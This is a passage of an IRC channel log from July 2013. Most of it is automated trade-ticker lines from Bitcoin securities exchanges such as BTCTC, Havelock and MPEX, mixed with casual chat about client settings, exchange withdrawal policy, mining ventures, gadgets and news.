[BTCTC] [AMC-PT] 50 @ 0.003689 = 0.1845 BTC [+] Jul 24 16:24:13 [BTCTC] [AMC-PT] 51 @ 0.003689 = 0.1881 BTC [+] Jul 24 16:26:06 [HAVELOCK] [AM100] 1 @ 0.0444 BTC [+] Jul 24 16:35:34 https://sites.google.com/site/forgottenemployee/ Jul 24 16:35:41 Forgotten Employee Jul 24 16:35:48 [BTCTC] [AMC-PT] 21 @ 0.003689 = 0.0775 BTC [+] Jul 24 16:36:35 [BTCTC] [AMC-PT] 25 @ 0.003689 = 0.0922 BTC [+] Jul 24 16:36:38 [BTCTC] [ASICMINER-PT] 1 @ 4.733 BTC [+] Jul 24 16:36:52 [BTCTC] [AMC-PT] 54 @ 0.003689 = 0.1992 BTC [+] Jul 24 16:37:13 [BTCTC] [ASICMINER-PT] 1 @ 4.728 BTC [-] Jul 24 16:39:15 [BTCTC] [TAT.ASICMINER] 36 @ 0.047 = 1.692 BTC [+] Jul 24 16:40:34 Too long to read Jul 24 16:40:42 nah its good Jul 24 16:41:18 Funny good or feel good good? Jul 24 16:41:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.047 BTC [+] Jul 24 16:41:33 last sentence: I beat my high score in "Snake". Jul 24 16:41:34 hmm :D Jul 24 16:41:57 I need to add a timestamp to this mofo Jul 24 16:42:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.0465 BTC [-] Jul 24 16:42:23 ?? Jul 24 16:42:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.0465 BTC [-] Jul 24 16:43:05 I was trying to setup a timestamp for xchat, but can't seem to find the option Jul 24 16:43:27 ah okay Jul 24 16:45:19 interface->appearance, time stamps Jul 24 16:47:12 Yep there it is Jul 24 16:47:20 Thanks Jul 24 16:49:17 [HAVELOCK] [AM100] 4 @ 0.0444 = 0.1776 BTC [+] Jul 24 16:49:24 [HAVELOCK] [AM100] 2 @ 0.04444 = 0.0889 BTC [+] Jul 24 16:51:10 [BTCTC] [PAJKA.BOND] 1 @ 0.04687 BTC [-] Jul 24 16:51:41 [HAVELOCK] [AM100] 1 @ 0.0444 BTC [-] Jul 24 16:53:12 [BTCTC] [DMS.SELLING] 25 @ 0.0201 = 0.5025 BTC [-] Jul 24 16:53:14 [BTCTC] [DMS.SELLING] 25 @ 0.02001 = 0.5003 BTC [-] Jul 24 16:53:15 [BTCTC] [DMS.SELLING] 42 @ 0.02 = 0.84 BTC [-] Jul 24 16:53:17 [BTCTC] [DMS.SELLING] 10 @ 0.0198 = 0.198 BTC [-] Jul 24 16:53:18 [BTCTC] [DMS.SELLING] 100 @ 0.01972 = 1.972 BTC [-] Jul 24 16:53:20 [BTCTC] [DMS.SELLING] 92 @ 0.0197 = 1.8124 BTC [-] Jul 24 16:55:34 who is here? Jul 24 16:55:57 < Jul 24 16:56:00 u Jul 24 16:56:53 [BTCTC] [AMC-PT] 100 @ 0.0035 = 0.35 BTC [-] Jul 24 16:56:55 [BTCTC] [AMC-PT] 100 @ 0.0035 = 0.35 BTC [-] Jul 24 16:56:57 [BTCTC] [AMC-PT] 800 @ 0.0034 = 2.72 BTC [-] Jul 24 17:00:41 [BTCTC] [TAT.MINIGAME] 1 @ 0.0003 BTC [+] Jul 24 17:00:43 [BTCTC] [TAT.MINIGAME] 20 @ 0.0003009 = 0.006 BTC [+] Jul 24 17:00:45 [BTCTC] [TAT.MINIGAME] 19 @ 0.000301 = 0.0057 BTC [+] Jul 24 17:02:27 [BTCTC] [BMF] 18 @ 0.03301 = 0.5942 BTC [+] Jul 24 17:03:26 [BTCTC] [KENILWORTH] 40 @ 0.002 = 0.08 BTC Jul 24 17:03:28 [BTCTC] [KENILWORTH] 20000 @ 0.0018 = 36 BTC [-] Jul 24 17:03:30 [BTCTC] [KENILWORTH] 500 @ 0.0018 = 0.9 BTC [-] Jul 24 17:03:52 [BTCTC] [DMS.SELLING] 7 @ 0.0194 = 0.1358 BTC [-] Jul 24 17:03:54 [BTCTC] [DMS.SELLING] 27 @ 0.01939 = 0.5235 BTC [-] Jul 24 17:03:55 [BTCTC] [DMS.SELLING] 9 @ 0.01921 = 0.1729 BTC [-] Jul 24 17:03:57 [BTCTC] [DMS.SELLING] 149 @ 0.0192 = 2.8608 BTC [-] Jul 24 17:03:58 [BTCTC] [DMS.SELLING] 985 @ 0.01903 = 18.7446 BTC [-] Jul 24 17:05:00 Kenilworth sounds like an interesting concept for a btct Jul 24 17:07:08 it does, but people say the real world mining sector is not really worth Jul 24 17:08:36 [HAVELOCK] [SDSTM] 1 @ 0.01094 BTC [+] Jul 24 17:10:54 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.002905 = 0.0291 BTC [-] Jul 24 17:11:16 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.002905 = 0.0291 BTC [-] Jul 24 17:11:18 [MPEX] [S.MPOE] 17802 @ 0.00080013 = 14.2439 BTC [+] Jul 24 17:11:20 [MPEX] [S.MPOE] 8057 @ 0.00080186 = 6.4606 BTC [+] Jul 24 17:11:44 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.002905 = 0.0291 BTC [-] Jul 24 17:12:33 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.002905 = 0.0291 BTC [-] Jul 24 17:15:08 [BTCTC] [AMC-PT] 25 @ 0.003687 = 0.0922 BTC [+] Jul 24 17:15:10 [BTCTC] [AMC-PT] 100 @ 0.003688 = 0.3688 BTC [+] Jul 24 17:15:26 [HAVELOCK] [AM100] 1 @ 0.04444 BTC [+] Jul 24 17:16:35 [BTCTC] [AMC-PT] 17 @ 0.003689 = 0.0627 BTC [+] Jul 24 17:23:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.047 = 0.235 BTC [+] Jul 24 17:23:50 [BTCTC] [TAT.MINIGAME] 700 @ 0.000275 = 0.1925 BTC [-] Jul 24 17:27:13 [HAVELOCK] [SDSTM] 1 @ 0.01093 BTC [-] Jul 24 17:35:03 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.003237 = 0.0194 BTC [+] Jul 24 17:38:43 [MPEX] [S.MPOE] 6534 @ 0.00080186 = 5.2394 BTC [+] Jul 24 17:38:45 [MPEX] [S.MPOE] 1800 @ 0.0008019 = 1.4434 BTC [+] Jul 24 17:38:56 [MPEX] [S.MPOE] 586 @ 0.00080269 = 0.4704 BTC [+] Jul 24 17:44:27 hi, quick question about btct, it says withdrawal to addresses other than those you own personally is against site policy. so does that means I can't withdraw straight to another exchange, such as bitstamp? Jul 24 17:45:01 Generally the comment is regarding money laundering Jul 24 17:45:16 so I think you are okay to move money between accounts you control Jul 24 17:45:19 [HAVELOCK] [AM100] 12 @ 0.04444 = 0.5333 BTC [+] Jul 24 17:45:21 ok, thanks Jul 24 17:45:56 np Jul 24 17:48:28 [BTCTC] [AMC-PT] 68 @ 0.003684 = 0.2505 BTC [-] Jul 24 17:50:40 [BTCTC] [BASIC-MINING] 1 @ 0.5448 BTC [+] Jul 24 17:53:04 I think it's related to satoshi dice things Jul 24 17:53:17 as it can't work with it Jul 24 17:53:20 yea, btct uses shared wallets Jul 24 17:54:38 [BTCTC] [KENILWORTH] 40 @ 0.0018 = 0.072 BTC [-] Jul 24 17:55:37 [HAVELOCK] [SMG] 3250 @ 0.00028 = 0.91 BTC [+] Jul 24 17:57:16 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [+] Jul 24 17:58:20 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [-] Jul 24 17:58:32 [BTCTC] [TAT.MINIGAME] 1 @ 0.000293 BTC [+] Jul 24 17:58:49 This Kenilworth corp is somewhat interesting, nice site too. Jul 24 18:00:08 [BTCTC] [KENILWORTH] 1600 @ 0.0018 = 2.88 BTC [-] Jul 24 18:01:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.047 = 0.094 BTC [+] Jul 24 18:04:42 [BTCTC] [TAT.MINIGAME] 21 @ 0.000293 = 0.0062 BTC [+] Jul 24 18:12:34 [MPEX] [S.MG] 10603 @ 0.00025 = 2.6508 BTC [-] Jul 24 18:13:32 [BTCTC] [AMC-PT] 5 @ 0.003681 = 0.0184 BTC [-] Jul 24 18:13:51 [BTCTC] [AMC-PT] 10 @ 0.003682 = 0.0368 BTC [+] Jul 24 18:14:48 [BTCTC] [AMC-PT] 291 @ 0.003684 = 1.072 BTC [+] Jul 24 18:15:05 [BTCTC] [TAT.MINIGAME] 100 @ 0.000271 = 0.0271 BTC [-] Jul 24 18:15:07 [BTCTC] [TAT.MINIGAME] 50 @ 0.0002701 = 0.0135 BTC [-] Jul 24 18:15:09 [BTCTC] [TAT.MINIGAME] 850 @ 0.00027 = 0.2295 BTC [-] Jul 24 18:15:11 [BTCTC] [AMC-PT] 1 @ 0.003684 BTC [+] Jul 24 18:22:29 [BTCTC] [TAT.MINIGAME] 150 @ 0.00027 = 0.0405 BTC [-] Jul 24 18:22:31 [BTCTC] [TAT.MINIGAME] 831 @ 0.000261 = 0.2169 BTC [-] Jul 24 18:22:54 [BTCTC] [TAT.MINIGAME] 1 @ 0.000292 BTC [+] Jul 24 18:22:56 [BTCTC] [TAT.MINIGAME] 479 @ 0.000293 = 0.1403 BTC [+] Jul 24 18:22:57 [BTCTC] [TAT.MINIGAME] 520 @ 0.000295 = 0.1534 BTC [+] Jul 24 18:25:37 [HAVELOCK] [AM100] 3 @ 0.0444999 = 0.1335 BTC [+] Jul 24 18:27:41 [BTCTC] [TAT.ASICMINER] 70 @ 0.047 = 3.29 BTC [+] Jul 24 18:29:12 [HAVELOCK] [HIM] 3 @ 0.226 = 0.678 BTC [-] Jul 24 18:29:25 [HAVELOCK] [HIM] 1 @ 0.225 BTC [-] Jul 24 18:29:34 [HAVELOCK] [HIM] 1 @ 0.224 BTC [-] Jul 24 18:29:43 [HAVELOCK] [HIM] 10 @ 0.2238 = 2.238 BTC [-] Jul 24 18:29:46 [HAVELOCK] [AM1] 2 @ 4.715 = 9.43 BTC [+] Jul 24 18:30:43 [HAVELOCK] [HIM] 1 @ 0.22 BTC [-] Jul 24 18:31:10 [BTCTC] [BITVPS] 1 @ 0.002002 BTC [-] Jul 24 18:31:11 [BTCTC] [BITVPS] 20 @ 0.002001 = 0.04 BTC [-] Jul 24 18:31:14 [BTCTC] [BITVPS] 550 @ 0.002 = 1.1 BTC [-] Jul 24 18:31:17 [BTCTC] [BITVPS] 250 @ 0.002 = 0.5 BTC [-] Jul 24 18:31:53 [HAVELOCK] [AM100] 9 @ 0.04449989 = 0.4005 BTC [-] Jul 24 18:32:15 [BTCTC] [KENILWORTH] 900 @ 0.0018 = 1.62 BTC [-] Jul 24 18:33:02 publio: you still there? Jul 24 18:33:03 Yeah I'm glad that I asked for a refund on my singles, saw the update from Monday... Still working on June 23 2012 orders? Fuck that Jul 24 18:33:20 if so did you get any word on BMF? Jul 24 18:33:36 Rulother_: DUUUUUUDE Jul 24 18:33:39 [BTCTC] [TAT.MINIGAME] 2 @ 0.000295 = 0.0006 BTC [+] Jul 24 18:34:24 [BTCTC] [ASICMINER-PT] 8 @ 4.4 = 35.2 BTC [-] Jul 24 18:34:38 [BTCTC] [TAT.MINIGAME] 1 @ 0.000295 BTC [+] Jul 24 18:35:34 [BTCTC] [S.BBET-PT] 10 @ 0.001922 = 0.0192 BTC [-] Jul 24 18:36:29 [BTCTC] [S.BBET-PT] 8 @ 0.001921 = 0.0154 BTC [-] Jul 24 18:36:58 [BTCTC] [AMC-PT] 74 @ 0.003684 = 0.2726 BTC [+] Jul 24 18:37:13 Rulother_: yeah, by the time BFL catches up the equipment will be two generations obsolete Jul 24 18:38:47 [BTCTC] [S.MPOE-PT] 150 @ 0.000839 = 0.1259 BTC [+] Jul 24 18:39:13 [MPEX] [S.MPOE] 10750 @ 0.00080269 = 8.6289 BTC [+] Jul 24 18:40:10 [BTCTC] [GSDPT] 53 @ 0.00335 = 0.1776 BTC [-] Jul 24 18:40:54 [BTCTC] [KENILWORTH] 1000 @ 0.0018 = 1.8 BTC [-] Jul 24 18:41:55 [BTCTC] [KENILWORTH] 1000 @ 0.0018 = 1.8 BTC [-] Jul 24 18:42:10 [BTCTC] [BITVPS] 50 @ 0.00199 = 0.0995 BTC [-] Jul 24 18:45:49 [BTCTC] [AMC-PT] 119 @ 0.003683 = 0.4383 BTC [-] Jul 24 18:46:41 [HAVELOCK] [AM100] 25 @ 0.04449989 = 1.1125 BTC [-] Jul 24 18:46:49 [BTCTC] [DMS.SELLING] 230 @ 0.01998 = 4.5954 BTC [+] Jul 24 18:48:08 [BTCTC] [KENILWORTH] 2000 @ 0.0018 = 3.6 BTC [-] Jul 24 18:48:49 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [+] Jul 24 18:50:58 [BTCTC] [DMS.MINING] 2 @ 0.01464 = 0.0293 BTC [-] Jul 24 18:50:58 [BTCTC] [DMS.MINING] 2 @ 0.01464 = 0.0293 BTC [-] Jul 24 18:50:58 [HAVELOCK] [SDSTM] 2 @ 0.0101 = 0.0202 BTC [-] Jul 24 18:51:02 [HAVELOCK] [SDSTM] 1 @ 0.0101 BTC [-] Jul 24 18:51:03 [HAVELOCK] [SDSTM] 1 @ 0.01001 BTC [-] Jul 24 18:51:13 [HAVELOCK] [SDSTM] 5 @ 0.01 = 0.05 BTC [-] Jul 24 18:51:17 [BTCTC] [KENILWORTH] 2000 @ 0.0018 = 3.6 BTC [-] Jul 24 18:51:55 [BTCTC] [KENILWORTH] 2000 @ 0.0018 = 3.6 BTC [-] Jul 24 18:52:32 [BTCTC] [KENILWORTH] 15 @ 0.0018 = 0.027 BTC [-] Jul 24 18:54:26 [BTCTC] [DMS.MINING] 60 @ 0.01465 = 0.879 BTC [+] Jul 24 18:56:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.0466 = 0.1398 BTC [-] Jul 24 18:57:18 [BTCTC] [KENILWORTH] 5 @ 0.0018 = 0.009 BTC [-] Jul 24 18:57:49 [BTCTC] [AMC-PT] 7 @ 0.003436 = 0.0241 BTC [-] Jul 24 18:57:50 [BTCTC] [AMC-PT] 15 @ 0.003435 = 0.0515 BTC [-] Jul 24 18:57:52 [BTCTC] [AMC-PT] 10 @ 0.003427 = 0.0343 BTC [-] Jul 24 18:57:54 [BTCTC] [AMC-PT] 43 @ 0.003426 = 0.1473 BTC [-] Jul 24 18:57:55 [BTCTC] [TAT.MINIGAME] 490 @ 0.000289 = 0.1416 BTC [-] Jul 24 18:59:28 [BTCTC] [TAT.ASICMINER] 14 @ 0.0466 = 0.6524 BTC [-] Jul 24 18:59:30 [BTCTC] [TAT.ASICMINER] 7 @ 0.0466 = 0.3262 BTC [-] Jul 24 18:59:49 [BTCTC] [TAT.MINIGAME] 10 @ 0.000289 = 0.0029 BTC [-] Jul 24 18:59:51 [BTCTC] [TAT.MINIGAME] 1 @ 0.000294 BTC [+] Jul 24 18:59:52 [BTCTC] [TAT.MINIGAME] 477 @ 0.000295 = 0.1407 BTC [+] Jul 24 18:59:54 [BTCTC] [TAT.MINIGAME] 312 @ 0.000295 = 0.092 BTC [+] Jul 24 19:01:47 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [+] Jul 24 19:03:12 hey, what time does AM usually post div's? Jul 24 19:03:28 afternoon, evening.. is there a pattern? Jul 24 19:04:38 [BTCTC] [KENILWORTH] 10000 @ 0.0018 = 18 BTC [-] Jul 24 19:04:44 [BTCTC] [TAT.MINIGAME] 1 @ 0.000295 BTC [+] Jul 24 19:05:47 very quiet today.. Jul 24 19:07:09 [BTCTC] [AMC-PT] 325 @ 0.0035 = 1.1375 BTC [+] Jul 24 19:07:35 [BTCTC] [AMC-PT] 3 @ 0.003451 = 0.0104 BTC [-] Jul 24 19:07:40 [BTCTC] [AMC-PT] 4 @ 0.00345 = 0.0138 BTC [-] Jul 24 19:12:14 [HAVELOCK] [AM100] 5 @ 0.04444 = 0.2222 BTC [-] Jul 24 19:16:31 [BTCTC] [DMS.MINING] 29 @ 0.01355 = 0.393 BTC [-] Jul 24 19:17:10 [BTCTC] [DMS.SELLING] 14 @ 0.01761 = 0.2465 BTC [-] Jul 24 19:17:15 [BTCTC] [DMS.SELLING] 180 @ 0.0176 = 3.168 BTC [-] Jul 24 19:18:42 [BTCTC] [DMS.MINING] 1 @ 0.01355 BTC [-] Jul 24 19:19:21 [BTCTC] [DMS.MINING] 10 @ 0.01355 = 0.1355 BTC [-] Jul 24 19:20:40 [BTCTC] [TAT.ASICMINER] 20 @ 0.04677 = 0.9354 BTC [+] Jul 24 19:20:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.04677 = 0.4677 BTC [+] Jul 24 19:20:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.04677 = 0.2339 BTC [+] Jul 24 19:20:40 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [-] Jul 24 19:21:13 [BTCTC] [S.MPOE-PT] 12 @ 0.000839 = 0.0101 BTC [+] Jul 24 19:22:10 [BTCTC] [TAT.MINIGAME] 4 @ 0.000295 = 0.0012 BTC [+] Jul 24 19:22:31 [BTCTC] [COGNITIVE] 1 @ 0.7 BTC [+] Jul 24 19:22:33 [BTCTC] [COGNITIVE] 1 @ 0.68 BTC [-] Jul 24 19:22:34 [BTCTC] [COGNITIVE] 1 @ 0.655 BTC [-] Jul 24 19:22:36 [BTCTC] [COGNITIVE] 1 @ 0.6525 BTC [-] Jul 24 19:22:38 [BTCTC] [COGNITIVE] 1 @ 0.6524 BTC [-] Jul 24 19:27:26 [BTCTC] [COGNITIVE] 10 @ 0.6505 = 6.505 BTC [-] Jul 24 19:27:28 [BTCTC] [COGNITIVE] 2 @ 0.6504 = 1.3008 BTC [-] Jul 24 19:27:30 [BTCTC] [COGNITIVE] 5 @ 0.6503 = 3.2515 BTC [-] Jul 24 19:27:32 [BTCTC] [COGNITIVE] 5 @ 0.6502 = 3.251 BTC [-] Jul 24 19:27:34 [BTCTC] [COGNITIVE] 22 @ 0.65 = 14.3 BTC [-] Jul 24 19:27:49 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [-] Jul 24 19:32:39 [BTCTC] [BASIC-MINING] 1 @ 0.53 BTC [-] Jul 24 19:33:02 [BTCTC] [AMC-PT] 25 @ 0.0035 = 0.0875 BTC [+] Jul 24 19:36:39 [BTCTC] [COGNITIVE] 1 @ 0.615092 BTC [-] Jul 24 19:37:29 [BTCTC] [COGNITIVE] 1 @ 0.6141 BTC [-] Jul 24 19:38:07 [BTCTC] [TAT.MINIGAME] 3 @ 0.000295 = 0.0009 BTC [+] Jul 24 19:38:15 [BTCTC] [DMS.SELLING] 1 @ 0.01989 BTC [+] Jul 24 19:38:37 ThickasThieves , you around Jul 24 19:40:13 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [+] Jul 24 19:42:08 [BTCTC] [DMS.SELLING] 2 @ 0.01989 = 0.0398 BTC [+] Jul 24 19:42:09 [BTCTC] [TAT.MINIGAME] 1 @ 0.000295 BTC [+] Jul 24 19:42:38 [HAVELOCK] [AM100] 1 @ 0.04444878 BTC [+] Jul 24 19:42:41 [BTCTC] [TAT.MINIGAME] 27 @ 0.000295 = 0.008 BTC [+] Jul 24 19:44:36 [HAVELOCK] [AM100] 6 @ 0.04444878 = 0.2667 BTC [+] Jul 24 19:45:50 [BTCTC] [BASIC-MINING] 1 @ 0.5 BTC [-] Jul 24 19:45:51 [BTCTC] [BASIC-MINING] 1 @ 0.5 BTC [-] Jul 24 19:45:54 [BTCTC] [BASIC-MINING] 1 @ 0.5 BTC [-] Jul 24 19:45:55 [BTCTC] [BASIC-MINING] 2 @ 0.4701 = 0.9402 BTC [-] Jul 24 19:45:56 [BTCTC] [BASIC-MINING] 1 @ 0.47 BTC [-] Jul 24 19:45:58 [BTCTC] [BASIC-MINING] 1 @ 0.465 BTC [-] Jul 24 19:45:59 [BTCTC] [BASIC-MINING] 1 @ 0.4601 BTC [-] Jul 24 19:47:47 [BTCTC] [TAT.ASICMINER] 12 @ 0.047 = 0.564 BTC [+] Jul 24 19:52:21 [BTCTC] [DMS.MINING] 200 @ 0.0135 = 2.7 BTC [-] Jul 24 19:52:23 [BTCTC] [DMS.MINING] 100 @ 0.01331 = 1.331 BTC [-] Jul 24 19:52:25 [BTCTC] [DMS.MINING] 30 @ 0.0133 = 0.399 BTC [-] Jul 24 19:52:27 [BTCTC] [DMS.MINING] 20 @ 0.0133 = 0.266 BTC [-] Jul 24 19:52:30 [BTCTC] [DMS.MINING] 100 @ 0.01327 = 1.327 BTC [-] Jul 24 19:52:30 [BTCTC] [DMS.MINING] 50 @ 0.01326 = 0.663 BTC [-] Jul 24 19:52:58 [BTCTC] [BASIC-MINING] 2 @ 0.4601 = 0.9202 BTC [-] Jul 24 19:53:20 So there's been a steady sell off of Basic Jul 24 19:53:53 [BTCTC] [COGNITIVE] 1 @ 0.6141 BTC [-] Jul 24 19:54:32 [BTCTC] [DMS.MINING] 25 @ 0.01326 = 0.3315 BTC [-] Jul 24 19:54:34 [BTCTC] [DMS.MINING] 100 @ 0.01325 = 1.325 BTC [-] Jul 24 19:54:36 [BTCTC] [DMS.MINING] 10 @ 0.01301 = 0.1301 BTC [-] Jul 24 19:54:38 [BTCTC] [DMS.MINING] 90 @ 0.013 = 1.17 BTC [-] Jul 24 19:54:39 [BTCTC] [DMS.MINING] 100 @ 0.01285 = 1.285 BTC [-] Jul 24 19:54:41 [BTCTC] [DMS.MINING] 100 @ 0.01251 = 1.251 BTC [-] Jul 24 19:54:43 [BTCTC] [DMS.MINING] 175 @ 0.0125 = 2.1875 BTC [-] Jul 24 19:54:45 [BTCTC] [DMS.MINING] 6 @ 0.01468 = 0.0881 BTC [+] Jul 24 19:55:55 [BTCTC] [TAT.ASICMINER] 33 @ 0.047 = 1.551 BTC [+] Jul 24 19:56:47 [BTCTC] [AMC-PT] 4 @ 0.003599 = 0.0144 BTC [+] Jul 24 19:57:06 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003229 = 0.0323 BTC [-] Jul 24 19:58:00 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003229 = 0.0323 BTC [-] Jul 24 19:58:02 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.00323 = 0.0355 BTC [+] Jul 24 19:59:11 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003004 = 0.03 BTC [-] Jul 24 20:01:12 [BTCTC] [TAT.ASICMINER] 7 @ 0.047 = 0.329 BTC [+] Jul 24 20:02:57 [BTCTC] [TAT.MINIGAME] 100 @ 0.000295 = 0.0295 BTC [+] Jul 24 20:03:07 [BTCTC] [PAJKA.BOND] 2 @ 0.04 = 0.08 BTC [-] Jul 24 20:05:00 [MPEX] [S.MPOE] 2964 @ 0.00080269 = 2.3792 BTC [+] Jul 24 20:06:03 [BTCTC] [TAT.MINIGAME] 500 @ 0.000295 = 0.1475 BTC [+] Jul 24 20:07:00 [BTCTC] [TAT.MINIGAME] 52 @ 0.000295 = 0.0153 BTC [+] Jul 24 20:07:01 [BTCTC] [TAT.MINIGAME] 948 @ 0.000302 = 0.2863 BTC [+] Jul 24 20:09:26 [BTCTC] [AMC-PT] 160 @ 0.00359 = 0.5744 BTC [-] Jul 24 20:09:28 [BTCTC] [AMC-PT] 121 @ 0.003598 = 0.4354 BTC [+] Jul 24 20:09:29 [BTCTC] [AMC-PT] 719 @ 0.003599 = 2.5877 BTC [+] Jul 24 20:09:50 [MPEX] [S.MPOE] 9850 @ 0.00080404 = 7.9198 BTC [+] Jul 24 20:11:49 [BTCTC] [AMC-PT] 11 @ 0.003598 = 0.0396 BTC [-] Jul 24 20:11:51 [BTCTC] [AMC-PT] 90 @ 0.003599 = 0.3239 BTC [+] Jul 24 20:12:05 [BTCTC] [DMS.SELLING] 14 @ 0.01988 = 0.2783 BTC [-] Jul 24 20:12:07 [BTCTC] [DMS.SELLING] 10 @ 0.01989 = 0.1989 BTC [+] Jul 24 20:12:50 [BTCTC] [TAT.MINIGAME] 50 @ 0.00027 = 0.0135 BTC [-] Jul 24 20:12:56 https://play.google.com/store/devices/details?id=chromecast Jul 24 20:12:58 Chromecast - Devices on Google Play Jul 24 20:13:31 [BTCTC] [BASIC-MINING] 1 @ 0.51 BTC [+] Jul 24 20:13:39 [HAVELOCK] [SMG] 93 @ 0.00027002 = 0.0251 BTC [-] Jul 24 20:13:42 I'm totally loving this device right now. Reading about it, anyways. Jul 24 20:13:42 [HAVELOCK] [SMG] 10 @ 0.00027001 = 0.0027 BTC [-] Jul 24 20:13:44 [HAVELOCK] [SMG] 50 @ 0.00027 = 0.0135 BTC [-] Jul 24 20:15:02 [BTCTC] [ASICMINER-PT] 8 @ 4.73 = 37.84 BTC [-] Jul 24 20:15:02 Commodity prices, slv, gld, oil have peaked for the intermediate future. Jul 24 20:15:38 [BTCTC] [DMS.MINING] 2 @ 0.014 = 0.028 BTC [-] Jul 24 20:16:16 Gold S1 1255, S2 1220, lower takes it to down to 1000. Jul 24 20:19:27 [HAVELOCK] [SMG] 137 @ 0.00027 = 0.037 BTC [-] Jul 24 20:22:30 [BTCTC] [TAT.MINIGAME] 4950 @ 0.00027 = 1.3365 BTC [-] Jul 24 20:25:00 [BTCTC] [AMC-PT] 1 @ 0.003665 BTC [+] Jul 24 20:25:02 [BTCTC] [AMC-PT] 19 @ 0.003665 = 0.0696 BTC [+] Jul 24 20:25:53 [MPEX] [S.MG] 5000 @ 0.00025 = 1.25 BTC [-] Jul 24 20:25:53 [BTCTC] [ASICMINER-PT] 1 @ 4.73 BTC [-] Jul 24 20:27:00 [BTCTC] [BASIC-MINING] 1 @ 0.4611 BTC [-] Jul 24 20:27:00 [BTCTC] [LTC-MINING] 1 @ 0.42 BTC [+] Jul 24 20:27:08 [BTCTC] [TAT.MINIGAME] 1000 @ 0.00027 = 0.27 BTC [-] Jul 24 20:27:46 [BTCTC] [AMC-PT] 58 @ 0.0035 = 0.203 BTC [-] Jul 24 20:27:57 http://www.theverge.com/2013/7/24/4552794/white-house-scrambles-to-shut-down-imminent-vote-to-defund-nsa-spying Jul 24 20:28:00 White House scrambles to shut down imminent vote to defund NSA spying | The Verge Jul 24 20:28:08 lol Jul 24 20:28:10 [HAVELOCK] [AM100] 100 @ 0.0444439 = 4.4444 BTC [-] Jul 24 20:28:10 Ass hats Jul 24 20:28:35 [BTCTC] [TAT.ASICMINER] 11 @ 0.0466 = 0.5126 BTC [-] Jul 24 20:28:51 [HAVELOCK] [HIM] 1 @ 0.2351 BTC [+] Jul 24 20:28:53 [HAVELOCK] [HIM] 1 @ 0.2387 BTC [+] Jul 24 20:28:56 [HAVELOCK] [HIM] 1 @ 0.23879999 BTC [+] Jul 24 20:28:58 [HAVELOCK] [HIM] 7 @ 0.2388 = 1.6716 BTC [+] Jul 24 20:29:01 [BTCTC] [ASICMINER-PT] 5 @ 4.73 = 23.65 BTC [-] Jul 24 20:29:09 [BTCTC] [BASIC-MINING] 1 @ 0.461 BTC [-] Jul 24 20:29:14 [MPEX] [S.MPOE] 10750 @ 0.00080404 = 8.6434 BTC [+] Jul 24 20:29:28 [BTCTC] [BASIC-MINING] 4 @ 0.4601 = 1.8404 BTC [-] Jul 24 20:29:59 [HAVELOCK] [SMG] 135 @ 0.00027 = 0.0365 BTC [-] Jul 24 20:30:46 [BTCTC] [KENILWORTH] 2 @ 0.0018 = 0.0036 BTC [-] Jul 24 20:34:24 [BTCTC] [ASICMINER-PT] 1 @ 4.73 BTC [-] Jul 24 20:36:35 [BTCTC] [KENILWORTH] 20 @ 0.0018 = 0.036 BTC [-] Jul 24 20:38:14 [HAVELOCK] [AM100] 46 @ 0.044444 = 2.0444 BTC [+] Jul 24 20:38:32 [BTCTC] [DMS.PURCHASE] 1 @ 0.03392 BTC [+] Jul 24 20:38:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.047 = 0.141 BTC [+] Jul 24 20:39:06 [BTCTC] [AMC-PT] 1400 @ 0.003673 = 5.1422 BTC [+] Jul 24 20:39:08 [BTCTC] [AMC-PT] 1000 @ 0.003674 = 3.674 BTC [+] Jul 24 20:39:09 [BTCTC] [AMC-PT] 800 @ 0.003675 = 2.94 BTC [+] Jul 24 20:39:11 [BTCTC] [AMC-PT] 1000 @ 0.003675 = 3.675 BTC [+] Jul 24 20:39:11 [BTCTC] [AMC-PT] 1233 @ 0.003684 = 4.5424 BTC [+] Jul 24 20:39:13 there we go Jul 24 20:39:13 [BTCTC] [AMC-PT] 1567 @ 0.003685 = 5.7744 BTC [+] Jul 24 20:39:45 [BTCTC] [ASICMINER-PT] 3 @ 4.75 = 14.25 BTC [+] Jul 24 20:39:46 [BTCTC] [S.MPOE-PT] 21 @ 0.000839 = 0.0176 BTC [+] Jul 24 20:39:55 [HAVELOCK] [AM100] 69 @ 0.0443 = 3.0567 BTC [-] Jul 24 20:39:58 [HAVELOCK] [AM100] 12 @ 0.044444 = 0.5333 BTC [+] Jul 24 20:40:00 [HAVELOCK] [AM100] 43 @ 0.04444878 = 1.9113 BTC [+] Jul 24 20:40:02 [HAVELOCK] [AM100] 100 @ 0.04444887 = 4.4449 BTC [+] Jul 24 20:40:04 [HAVELOCK] [AM100] 76 @ 0.04444888 = 3.3781 BTC [+] Jul 24 20:40:07 [HAVELOCK] [AM100] 21 @ 0.04444888 = 0.9334 BTC [+] Jul 24 20:40:14 [BTCTC] [DMS.PURCHASE] 12 @ 0.03392 = 0.407 BTC [+] Jul 24 20:40:58 [BTCTC] [TAT.ASICMINER] 43 @ 0.0466 = 2.0038 BTC [-] Jul 24 20:41:00 [BTCTC] [TAT.ASICMINER] 8 @ 0.0466 = 0.3728 BTC [-] Jul 24 20:41:01 I thought I'd never say this: Go republicans! Jul 24 20:41:02 